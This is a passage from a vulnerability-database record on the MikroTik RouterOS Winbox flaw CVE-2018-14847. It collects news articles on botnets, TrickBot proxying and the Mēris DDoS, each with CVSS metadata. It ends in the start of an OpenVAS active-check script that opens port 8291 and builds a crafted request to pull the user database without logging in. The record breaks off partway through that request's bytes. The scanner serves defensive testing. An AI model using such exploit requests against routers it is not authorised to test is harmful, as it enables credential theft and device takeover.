botnet-as-a-service.\n\nIn light of these attacks, it's recommended that users update their routers with the latest security patches, set up a strong router password, and disable the router's administration interface from the public side.\n\n\"It also shows, what is quite obvious for some time already, that IoT devices are being heavily targeted not just to run malware on them, which is hard to write and spread massively considering all the different architectures and OS versions, but to simply use their legal and built-in capabilities to set them up as proxies,\" Hron said. \"This is done to either anonymize the attacker's traces or to serve as a DDoS amplification tool.\"\n\n**_Update:_** Latvian company MikroTik told The Hacker News that the number \"was only true before we released the patch in [the] year 2018. After patch was released, the actual affected number of devices is closer to 20,000 units that still run the older software. Also, not all of them are actually controlled by the botnet, many of them have a strict firewall in place, even though running older software.\"\n\nWhen reached out to Avast for comment, the cybersecurity company confirmed that the number of affected devices (~230,000) reflected the status of the botnet prior to its disruption. \"However, there are still isolated routers with compromised credentials or staying unpatched on the internet,\" the company said in a statement.\n\n_(The headline of the article has been corrected to take into account the fact that the number of affected MikroTik routers is no longer more than 200,000 as previously stated.)_\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-03-23T09:49:00", "type": "thn", "title": "Botnet of Thousands of MikroTik Routers Abused in Glupteba, TrickBot Campaigns", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2022-03-24T02:39:20", "id": "THN:359CE3E905570B30722F914C18196DEB", "href": "https://thehackernews.com/2022/03/over-200000-microtik-routers-worldwide.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-05-09T12:37:27", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjtABJtT4zheeL0GMjWhl2OjB3Do_4F7ldpyEPdM_cfDSLIJU8NaQk_VLf7iknCvtaVVH7IC21zhlVJUfWSa8SxMjevGqJqVH0JW480uIDFhKz-M107U4ZX5oOYC_HkCLNPWd1C_B_whSRDYpoJVl-EjsCQcwPGktu3RIhNMEVHcvuB5EOa4PO0ebGT>)\n\nMicrosoft on Wednesday detailed a previously undiscovered technique put to use by the TrickBot malware that involves using compromised Internet of Things (IoT) devices as a go-between for establishing communications with the command-and-control (C2) servers.\n\n\"By using MikroTik routers as proxy servers for its C2 servers and redirecting the traffic through non-standard ports, TrickBot adds another persistence layer that helps malicious IPs evade detection by standard security systems,\" Microsoft's Defender for IoT Research Team and Threat Intelligence Center (MSTIC) [said](<https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/>).\n\nTrickBot, which emerged as a banking trojan in 2016, has evolved into a sophisticated and persistent threat, with its modular architecture enabling it to adapt its tactics to suit different networks, environments, and devices as well as offer access-as-a-service for next-stage payloads like Conti ransomware.\n\nThe expansion to TrickBot's capabilities comes amid reports of its [infrastructure going offline](<https://thehackernews.com/2022/03/trickbot-malware-gang-upgrades-its.html>), even as the botnet has continually refined its features to make its attack framework durable, evade reverse engineering, and maintain the stability of its C2 servers.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgmGbCwyvXca5lxmYnBKqNHp3ZW7Dy8L-XgAoMIE9Iq7RI3R9zdqxbDadh7h3INXYIN9js-Gkv7LQZkw19gcdGmfwTG_L-Gf_49W2twor70-cQeXueqbJAOyAkidVFe_61dAjyh2txEdU2IXT8yqDJiqa0s_JIFj9GmBlKKB0DJocVyZR9wKRUimXAl>)\n\nSpecifically, the new method identified by MSTIC involves leveraging hacked IoT devices such as routers from MikroTik to \"create a line of communication between the TrickBot-affected device and the C2 server.\"\n\nThis also entails breaking into the routers by using a combination of methods, namely default passwords, brute-force attacks, or exploiting a now-patched flaw in MikroTik RouterOS ([CVE-2018-14847](<https://blog.mikrotik.com/security/winbox-vulnerability.html>)), followed by changing the router's password to maintain access.\n\nIn the next step, the attackers then [issue](<https://github.com/microsoft/routeros-scanner>) a network address translation (NAT) command that's designed to redirect traffic between ports 449 and 80 in the router, establishing a path for the TrickBot-infected hosts to communicate with the C2 server.\n\nWhile potential connections between TrickBot and compromised MikroTik hosts were hinted before in [November 2018](<https://orangecyberdefense.com/uk/blog/cyberdefense/the-trickbot-and-mikrotik-connection/>), this is the first time the exact modus operandi has been laid bare open. With the malware [reaching its limits](<https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html>) last month and no new C2 servers registered since December 2021, it remains to be seen how the malware authors intend to take the operation forward.\n\n\"As security solutions for conventional computing devices continue to evolve and improve, attackers will explore alternative ways to compromise target networks,\" the researchers said. \"Attack attempts against routers and other IoT devices are not new, and being unmanaged, they can easily be the weakest links in the network.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-03-17T10:05:00", "type": "thn", "title": "TrickBot Malware Abusing MikroTik Routers as Proxies for Command-and-Control", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2022-03-21T05:49:06", "id": "THN:B6838707858897EC6614B5E5C61FDE23", "href": "https://thehackernews.com/2022/03/trickbot-malware-abusing-hacked-iot.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-09-11T12:35:29", "description": "[](<https://thehackernews.com/images/-6DBIyL-dibY/YTyQNcwhq6I/AAAAAAAADxs/VB8XNXC1KVsHh9raOrvyH6QfJr-JIBguwCLcBGAsYHQ/s0/yandex.gif>)\n\nRussian internet giant Yandex has been the target of a record-breaking distributed denial-of-service (DDoS) attack by a new botnet called M\u0113ris.\n\nThe botnet is believed to have pummeled the company's web infrastructure with millions of HTTP requests, before hitting a peak of 21.8 million requests per second (RPS), dwarfing a recent botnet-powered attack that came to light last month, [bombarding](<https://thehackernews.com/2021/08/cloudflare-mitigated-one-of-largest.html>) an unnamed Cloudflare customer in the financial industry with 17.2 million RPS.\n\nRussian DDoS mitigation service Qrator Labs, which disclosed details of the attack on Thursday, called [M\u0113ris](<https://blog.qrator.net/en/meris-botnet-climbing-to-the-record_142/>) \u2014 meaning \"Plague\" in the Latvian language \u2014 a \"botnet of a new kind.\" \n\n\"It is also clear that this particular botnet is still growing. There is a suggestion that the botnet could grow in force through password brute-forcing, although we tend to neglect that as a slight possibility. That looks like some vulnerability that was either kept secret before the massive campaign's start or sold on the black market,\" the researchers noted, adding M\u0113ris \"can overwhelm almost any infrastructure, including some highly robust networks [\u2026] due to the enormous RPS power that it brings along.\"\n\nThe DDoS attacks leveraged a technique called HTTP pipelining that allows a client (i.e., a web browser) to open a connection to the server and make multiple requests without waiting for each response. The malicious traffic originated from over 250,000 infected hosts, primarily network devices from Mikrotik, with evidence pointing to a spectrum of [RouterOS](<https://mikrotik.com/software>) versions that have been weaponized by exploiting as-yet-unknown vulnerabilities.\n\nBut in a forum post, the Latvian network equipment manufacturer said these attacks employ the same set of routers that were compromised via a 2018 vulnerability ([CVE-2018-14847](<https://nvd.nist.gov/vuln/detail/cve-2018-14847>), CVSS score: 9.1) that has since been patched and that there are no new (zero-day) vulnerabilities impacting the devices.\n\n\"Unfortunately, closing the vulnerability does not immediately protect these routers. If somebody got your password in 2018, just an upgrade will not help. You must also change password, re-check your firewall if it does not allow remote access to unknown parties, and look for scripts that you did not create,\" it [noted](<https://forum.mikrotik.com/viewtopic.php?f=21&t=178417>).\n\nM\u0113ris has also been linked to a number of DDoS attacks, including that mitigated by Cloudflare, noting the overlaps in \"durations and distributions across countries.\"\n\nWhile it's highly recommended to upgrade MikroTik devices to the latest firmware to combat any potential botnet attacks, organizations are also advised to change their administration passwords to safeguard against brute-force attempts.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2021-09-11T11:18:00", "type": "thn", "title": "M\u0113ris Botnet Hit Russia's Yandex With Massive 22 Million RPS DDoS Attack", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2021-09-11T11:18:02", "id": "THN:EF8F680E8C0B204C481C9D7B5974A0A7", "href": "https://thehackernews.com/2021/09/meris-botnet-hit-russias-yandex-with.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-05-09T12:40:48", "description": "[](<https://thehackernews.com/images/-eQL1Zn5CeL0/W7t3At8YpDI/AAAAAAAAyVk/bCEscpy4keMeb4QJmJD20N0slvmq1bD3wCLcBGAs/s728-e100/router-hacking-exploit.jpg>)\n\nA known vulnerability in MikroTik routers is potentially far more dangerous than previously thought. \n \nA cybersecurity researcher from Tenable Research has released a new proof-of-concept (PoC) RCE attack for an old directory traversal vulnerability that was found and patched within a day of its discovery in April this year. \n \nThe vulnerability, identified as CVE-2018-14847, was initially rated as medium in severity but should now be rated critical because the new hacking technique used against vulnerable MikroTik routers allows attackers to remotely execute code on affected devices and gain a root shell. \n \nThe vulnerability impacts Winbox\u2014a management component for administrators to set up their routers using a Web-based interface\u2014and a Windows GUI application for the RouterOS software used by the MikroTik devices. \n \nThe vulnerability allows \"remote attackers to bypass authentication and read arbitrary files by modifying a request to change one byte related to a Session ID.\" \n \n\n\n### New Hack Turned 'Medium' MikroTik Vulnerability Into 'Critical'\n\n \nHowever, the new attack method found by Tenable Research exploits the same vulnerability and takes it to one step ahead. \n \nA PoC exploit, called \"[By the Way](<https://github.com/tenable/routeros/tree/master/poc/bytheway>),\" released by Tenable Research Jacob Baines, first uses directory traversal vulnerability to steal administrator login credentials from user database file and the then writes another file on the system to gain root shell access remotely. \n \nIn other words, the new exploit could allow unauthorized attackers to hack MikroTik's RouterOS system, deploy malware payloads or bypass router firewall protections. \n \nThe technique is yet another security blow [against MikroTik routers](<https://thehackernews.com/2018/08/mikrotik-router-hacking.html>), which was previously targeted by the [VPNFilter malware](<https://thehackernews.com/2018/09/vpnfilter-router-hacking.html>) and used in an extensive [cryptojacking campaign](<https://thehackernews.com/2018/09/mikrotik-router-hacking.html>) uncovered a few months ago. \n \n\n\n### New MikroTik Router Vulnerabilities\n\nBesides this, Tenable Research also [disclosed](<https://www.tenable.com/blog/tenable-research-advisory-multiple-vulnerabilities-discovered-in-mikrotiks-routeros>) additional MikroTik RouterOS vulnerabilities, including: \n \n\n\n * CVE-2018-1156\u2014A stack buffer overflow flaw that could allow an authenticated remote code execution, allowing attackers to gain full system access and access to any internal system that uses the router.\n * CVE-2018-1157\u2014A file upload memory exhaustion flaw that allows an authenticated remote attacker to crash the HTTP server.\n * CVE-2018-1159\u2014A www memory corruption flaw that could crash the HTTP server by rapidly authenticating and disconnecting.\n * CVE-2018-1158\u2014A recursive parsing stack exhaustion issue that could crash the HTTP server via recursive parsing of JSON.\n \n \nThe vulnerabilities impact Mikrotik RouterOS firmware versions before 6.42.7 and 6.40.9. \n \nTenable Research reported the issues to MikroTik in May, and the company addressed the vulnerabilities by releasing its RouterOS versions 6.40.9, 6.42.7 and 6.43 in August. \n \nWhile all the vulnerabilities were patched over a month ago, a recent scan by Tenable Research revealed that 70 percent of routers (which equals to 200,000) are still vulnerable to attack. \n \nThe bottom line: If you own a MikroTik router and you have not updated its RouterOS, you should do it right now. \n \nAlso, if you are still using default credentials on your router, it is high time to change the default password and keep a unique, long and complex password.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2018-10-08T15:34:00", "type": "thn", "title": "New Exploit for MikroTik Router WinBox Vulnerability Gives Full Root Access", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1156", "CVE-2018-1157", "CVE-2018-1158", "CVE-2018-1159", "CVE-2018-14847"], "modified": "2018-10-08T15:34:52", "id": "THN:15F5633BC0BA0C82579744CCACA99558", "href": "https://thehackernews.com/2018/10/router-hacking-exploit.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:49", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEix1GGoHWyTZLIUNdkduXaLWZZLCDe-TrjKwb4KKIrRL4PHcksUfqokWOurA4_ELZuNKNgm7Lzql76g_MpF-S_rgaKWevi5N6GiIt-9KqwMvkGlA2FQ-8z0y745lviXIaO0r3idvFlLM9TuheAqeofoGLiUva3NgbZcTa9dIglhiqGnTrSFOQSgRIlQ>)\n\nAt least 300,000 IP addresses associated with MikroTik devices have been found vulnerable to multiple remotely exploitable security vulnerabilities that have since been patched by the popular supplier of routers and wireless ISP devices.\n\nThe most affected devices are located in China, Brazil, Russia, Italy, Indonesia, with the U.S. coming in at number eight, cybersecurity firm Eclypsium said in a report shared with The Hacker News.\n\n\"These devices are both powerful, [and] often highly vulnerable,\" the researchers [noted](<https://eclypsium.com/2021/12/09/when-honey-bees-become-murder-hornets/>). \"This has made MikroTik devices a favorite among threat actors who have commandeered the devices for everything from DDoS attacks, command-and-control (aka 'C2'), traffic tunneling, and more.\"\n\nMikroTik devices are an enticing target not least because there are more than two million of them deployed worldwide, posing a huge attack surface that can be leveraged by threat actors to mount an array of intrusions.\n\nIndeed, earlier this September, reports emerged of a new botnet named [M\u0113ris](<https://thehackernews.com/2021/09/meris-botnet-hit-russias-yandex-with.html>) that staged a record-breaking distributed denial-of-service (DDoS) attack against Russian internet company Yandex by using network devices from Mikrotik as an attack vector by exploiting a now-addressed security vulnerability in the operating system ([CVE-2018-14847](<https://blog.mikrotik.com/security/winbox-vulnerability.html>)).\n\nThis is not the first time MikroTik routers have been [weaponized](<https://thehackernews.com/2018/10/router-hacking-exploit.html>) in real world attacks. In 2018, cybersecurity firm Trustwave [discovered](<https://thehackernews.com/2018/08/mikrotik-router-hacking.html>) at least three massive malware campaigns exploiting hundreds of thousands of unpatched MikroTik routers to secretly install cryptocurrency miners on computers connected to them. The same year, China's Netlab 360 [reported](<https://thehackernews.com/2018/09/mikrotik-router-hacking.html>) that thousands of vulnerable MikroTik routers had been surreptitiously corralled into a botnet by leveraging CVE-2018-14847 to eavesdrop on network traffic.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjf-4TWedeGUlB_bMho_dY9tqYdz2Kvj7mLWtDTd0RfxyFAPtJXH2iyPwIJiltFNdCSHJBCWFoXv1M8Qr4AmqvvTF1dqJ33YucavckSpyBXtrf9w8Pna61zVy5EClw8XTx0MaP6ip-wBZn1j981BgwLTMh-GaRILYXmEwAs1Mkn1CbIkUXo7jicATJX>)\n\nCVE-2018-14847 is also among the four unaddressed vulnerabilities discovered over the last three years and which could enable full takeover of MikroTik devices -\n\n * [**CVE-2019-3977**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3977>) (CVSS score: 7.5) - MikroTik RouterOS insufficient validation of upgrade package's origin, allowing a reset of all usernames and passwords\n * [**CVE-2019-3978**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3978>) (CVSS score: 7.5) - MikroTik RouterOS insufficient protections of a critical resource, leading to cache poisoning\n * [**CVE-2018-14847**](<https://nvd.nist.gov/vuln/detail/CVE-2018-14847>) (CVSS score: 9.1) - MikroTik RouterOS directory traversal vulnerability in the WinBox interface\n * [**CVE-2018-7445**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7445>) (CVSS score: 9.8) - MikroTik RouterOS SMB buffer overflow vulnerability\n\nIn addition, Eclypsium researchers said they found 20,000 exposed MikroTik devices that injected cryptocurrency mining scripts into web pages that users visited.\n\n\"The ability for compromised routers to inject malicious content, tunnel, copy, or reroute traffic can be used in a variety of highly damaging ways,\" the researchers said. \"DNS poisoning could redirect a remote worker's connection to a malicious website or introduce a machine-the-middle.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEhMqn1SEjfxCQg0TlmBiRLjns0oxiNeJVLGXoWWhWiK8dgSFy0p3HPV-OqMPAYNzppLMBBv9DcbckRiwOOq1Y1WX0dsivBlkPWPsOjRkalNB-gaEQGLm3g11ijAzOl1tJr6T5DfWiAzLCP4gtQd-zgTHz8jCpvtouAWe7ipGxduIgP3puqfo_C43uoR>)\n\n\"An attacker could use well-known techniques and tools to potentially capture sensitive information such as stealing [MFA](<https://en.wikipedia.org/wiki/Multi-factor_authentication>) credentials from a remote user using SMS over WiFi. As with previous attacks, enterprise traffic could be tunneled to another location or malicious content injected into valid traffic,\" the researchers added.\n\nMikroTik routers are far from the only devices to have been co-opted into a botnet. Researchers from Fortinet this week disclosed how the [Moobot botnet](<https://www.fortinet.com/blog/threat-research/mirai-based-botnet-moobot-targets-hikvision-vulnerability>) is leveraging a known remote code execution (RCE) vulnerability in Hikvision video surveillance products ([CVE-2021-36260](<https://nvd.nist.gov/vuln/detail/CVE-2021-36260>)) to grow its network, and use the compromised devices to launch distributed denial-of-service (DDoS) attacks.\n\nIn a separate [report](<https://www.fortinet.com/blog/threat-research/manga-aka-dark-mirai-based-campaign-targets-new-tp-link-router-rce-vulnerability>), the enterprise cybersecurity firm said that the operators of a botnet known as Manga aka Dark Mirai are actively abusing a recently disclosed post-authenticated remote code execution vulnerability ([CVE-2021-41653](<https://nvd.nist.gov/vuln/detail/CVE-2021-41653>)) to hijack TP-Link routers and co-opt the appliances to their network of infected devices.\n\n## Update\n\nIn a statement shared with The Hacker News, the Latvian company said that \"there are no new vulnerabilities in RouterOS,\" while stressing that keeping the operating system up to date is an \"essential step to avoid all kinds of vulnerabilities.\"\n\n\"Unfortunately, closing the old vulnerability does not immediately protect the affected routers. We don't have an illegal backdoor to change the user's password and check their firewall or configuration. These steps must be done by the users themselves,\" the company explained.\n\n\"We try our best to reach out to all users of RouterOS and remind them to do software upgrades, use secure passwords, check their firewall to restrict remote access to unfamiliar parties, and look for unusual scripts. Unfortunately, many users have never been in contact with MikroTik and are not actively monitoring their devices. We cooperate with various institutions worldwide to look for other solutions as well.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-09T11:15:00", "type": "thn", "title": "Over 300,000 MikroTik Devices Found Vulnerable to Remote Hacking Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847", "CVE-2018-7445", "CVE-2019-3977", "CVE-2019-3978", "CVE-2021-36260", "CVE-2021-41653"], "modified": "2021-12-10T11:53:59", "id": "THN:C96E59A0B083B41A78F431F292E7E1D5", "href": "https://thehackernews.com/2021/12/over-300000-mikrotik-devices-found.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackread": [{"lastseen": "2018-10-10T00:22:42", "description": "By [Waqas](<https://www.hackread.com/author/hackread/>)\n\nTenable Research\u2019s cybersecurity researcher has released \u201cBy The way,\u201d which is a new PoC (proof-of-concept) RCE attack after identifying a new attack method to exploit an already discovered vulnerability in MikroTik routers. The vulnerability, identified as CVE-2018-14847, is an old directory traversal flaw, which was patched the same day it was detected in April, 2018. [\u2026]\n\nThis is a post from HackRead.com Read the original post: [MikroTik router vulnerability lets hackers bypass firewall to load malware undetected](<https://www.hackread.com/mikrotik-router-vulnerability-hackers-bypass-firewall-malware/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2018-10-09T17:37:16", "type": "hackread", "title": "MikroTik router vulnerability lets hackers bypass firewall to load malware undetected", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2018-10-09T17:37:16", "id": "HACKREAD:38EFBBF180E0993C3CC665D79BC0B551", "href": "https://www.hackread.com/mikrotik-router-vulnerability-hackers-bypass-firewall-malware/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2019-05-29T18:32:38", "description": "This host is running Mikrotik RouterOS and is prone to information\ndisclosure vulnerability.", "cvss3": {}, "published": "2018-07-06T00:00:00", "type": "openvas", "title": "Mikrotik RouterOS 'Winbox Service' Information Disclosure Vulnerability (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-14847"], "modified": "2019-03-11T00:00:00", "id": "OPENVAS:1361412562310141279", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_mikrotik_router_os_winbox_info_disc_vuln_active.nasl 14086 2019-03-11 09:05:57Z mmartin $\n#\n# Mikrotik RouterOS 'Winbox Service' Information Disclosure Vulnerability (Active Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/o:mikrotik:routeros\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141279\");\n script_version(\"$Revision: 14086 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-11 10:05:57 +0100 (Mon, 11 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-06 14:10:44 +0200 (Fri, 06 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n\n script_cve_id(\"CVE-2018-14847\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Mikrotik RouterOS 'Winbox Service' Information Disclosure Vulnerability (Active Check)\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mikrotik_router_routeros_consolidation.nasl\");\n script_mandatory_keys(\"mikrotik/detected\");\n script_require_ports(8291);\n\n script_tag(name:\"summary\", value:\"This host is running Mikrotik RouterOS and is prone to information\ndisclosure vulnerability.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error in the winbox service of routeros which\nallows remote users to download a user database file without successful authentication.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted request and checks the response.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote attacker to connect to the WinBox\nport and download a user database file. The remote user can then log in and take control of the router.\");\n\n script_tag(name:\"affected\", value:\"MikroTik Router OS versions 6.29 through 6.42, 6.43rcx prior to 6.43rc4.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to MikroTik Router OS version 6.42.1 or 6.43rc4 or later.\");\n\n script_xref(name:\"URL\", value:\"https://forum.mikrotik.com/viewtopic.php?t=133533\");\n script_xref(name:\"URL\", value:\"https://n0p.me/winbox-bug-dissection/\");\n script_xref(name:\"URL\", value:\"https://github.com/BasuCert/WinboxPoC\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\n\nport = 8291;\n\nif (!get_tcp_port_state(port))\n exit(0);\n\nsoc = open_sock_tcp(port);\nif (!soc)\n exit(0);\n\nquery1 = raw_string(0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,\n 0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,\n 0x00, 0xff, 0x09, 